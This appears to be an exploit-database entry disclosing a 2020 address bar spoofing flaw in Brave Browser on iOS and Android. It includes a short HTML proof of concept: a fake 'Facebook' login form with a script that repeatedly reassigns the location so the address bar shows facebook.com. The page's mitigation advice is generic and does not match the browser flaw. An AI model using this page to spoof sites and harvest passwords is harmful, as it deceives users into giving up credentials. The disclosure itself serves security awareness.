header-logo
Suggest Exploit
vendor:
Brave Browser
by:
N/A
8,8
CVSS
HIGH
Address Bar Spoofing
451
CWE
Product Name: Brave Browser
Affected Version From: 1.2.16 (16.09.30.10)
Affected Version To: 1.9.56
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: IOS and Android
2020

Brave Browser Suffers from Address Bar Spoofing Vulnerability

Address Bar spoofing is a critical vulnerability in which any attacker can spoof the address bar to a legit looking website but the content of the web-page remains different from the Address-Bar display of the site. In Simple words, the victim sees a familiar looking URL but the content is not from the same URL but the attacker controlled content.

Mitigation:

Implementing a secure authentication mechanism and using HTTPS protocol for all the webpages.
Source

Exploit-DB raw data:

Brave Browser Suffers from Address Bar Spoofing Vulnerability. Address Bar
spoofing is a critical vulnerability in which any attacker can spoof the
address bar to a legit looking website but the content of the web-page
remains different from the Address-Bar display of the site. In Simple
words, the victim sees a familiar looking URL but the content is not from
the same URL but the attacker controlled content. Some companies say "We
recognize that the address bar is the only reliable security indicator in
modern browsers" .
Products affected:

   - In IOS - Affected is the Latest Version 1.2.16 (16.09.30.10)
   - In Android - Affected in Brave Latest version 1.9.56


Exploit Code: 

<html>
<title>Address Bar spoofing Brave</title>
<h1> This is Dummy Facebook </h1>
<form>
Email: <input type="text" name="username" placeholder="add email"><br>
Password: <input type="text" name="password" placeholder="pass">
<script>
function f()
{
location = "https://facebook.com"
}
setInterval("f()", 10);
</script>
</html>

Navigation

Suggest Exploit

Services By CQR